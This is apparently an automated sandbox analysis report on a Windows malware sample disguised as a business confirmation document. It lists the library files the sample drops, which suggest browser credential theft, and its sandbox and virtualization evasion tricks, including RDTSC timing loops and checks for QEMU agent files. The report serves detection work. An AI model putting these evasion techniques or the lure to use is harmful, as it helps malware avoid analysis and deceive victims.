Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D4863 push edx; ret 0_2_005D4891
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0818 push edx; ret 0_2_005D0841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6814 push edx; ret 0_2_005D6841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3813 push edx; ret 0_2_005D3841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2013 push edx; ret 0_2_005D2041
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5013 push edx; ret 0_2_005D5041
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0008 push edx; ret 0_2_005D0031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6004 push edx; ret 0_2_005D6031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D4803 push edx; ret 0_2_005D4831
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3003 push edx; ret 0_2_005D3031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D1803 push edx; ret 0_2_005D1831

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F4854 second address: 00000000004F4854 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F1B00D673F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007F1B00D673DCh 0x0000002e call 00007F1B00D67413h 0x00000033 call 00007F1B00D67408h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F2F21 second address: 00000000004F2F21 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F07D5 second address: 00000000004F07D5 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F1E36 second address: 00000000004F1E36 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000562CA5 second address: 0000000000562CA5 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 000000000040C72F second address: 000000000040C72F instructions: 0x00000000 rdtsc 0x00000002 cmp dh, FFFFFF98h 0x00000005 xor eax, edx 0x00000007 fsqrt 0x00000009 jmp 00007F1B00D61E6Fh 0x0000000e cmp cl, 00000036h 0x00000011 dec edi 0x00000012 cmp di, 009Eh 0x00000017 cmp edi, 00000000h 0x0000001a jne 00007F1B00D61BC5h 0x00000020 cmp ah, 0000006Ch 0x00000023 mov ebx, 00458D3Dh 0x00000028 cmp ax, 000000B3h 0x0000002c xor ebx, 00385DF4h 0x00000032 cmp esi, 5Bh 0x00000035 fdecstp 0x00000037 jmp 00007F1B00D61E6Ch 0x0000003c sub ebx, 003E5A87h 0x00000042 cmp al, BBh 0x00000044 xor ebx, 007F7642h 0x0000004a cmp ch, FFFFFF91h 0x0000004d cmp eax, 1Dh 0x00000050 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F4854 second address: 00000000004F4854 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F1B00D673F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007F1B00D673DCh 0x0000002e call 00007F1B00D67413h 0x00000033 call 00007F1B00D67408h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F4874 second address: 00000000004F4874 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F1B00D62159h 0x0000001d popad 0x0000001e call 00007F1B00D61E6Fh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F2F21 second address: 00000000004F2F21 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F07D5 second address: 00000000004F07D5 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F1E36 second address: 00000000004F1E36 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F1F21 second address: 00000000004F239C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b add edi, 00001400h 0x00000011 test bl, al 0x00000013 mov eax, edi 0x00000015 mov ebx, eax 0x00000017 add ebx, 08h 0x0000001a mov dword ptr [eax], ebx 0x0000001c add ebx, 04h 0x0000001f mov dword ptr [eax+04h], ebx 0x00000022 sub edi, 00000400h 0x00000028 push edi 0x00000029 call 00007F1B00D621E0h 0x0000002e test cl, bl 0x00000030 push dword ptr [esp+04h] 0x00000034 jmp 00007F1B00D62D89h 0x00000039 call 00007F1B00D60DBCh 0x0000003e cmp dl, al 0x00000040 pop eax 0x00000041 pushad 0x00000042 lfence 0x00000045 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000564874 second address: 0000000000564874 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F1B00D677A9h 0x0000001d popad 0x0000001e call 00007F1B00D674BFh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000562CA0 second address: 0000000000562CA5 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 pushad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000562CA5 second address: 0000000000562CA5 instructions:
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
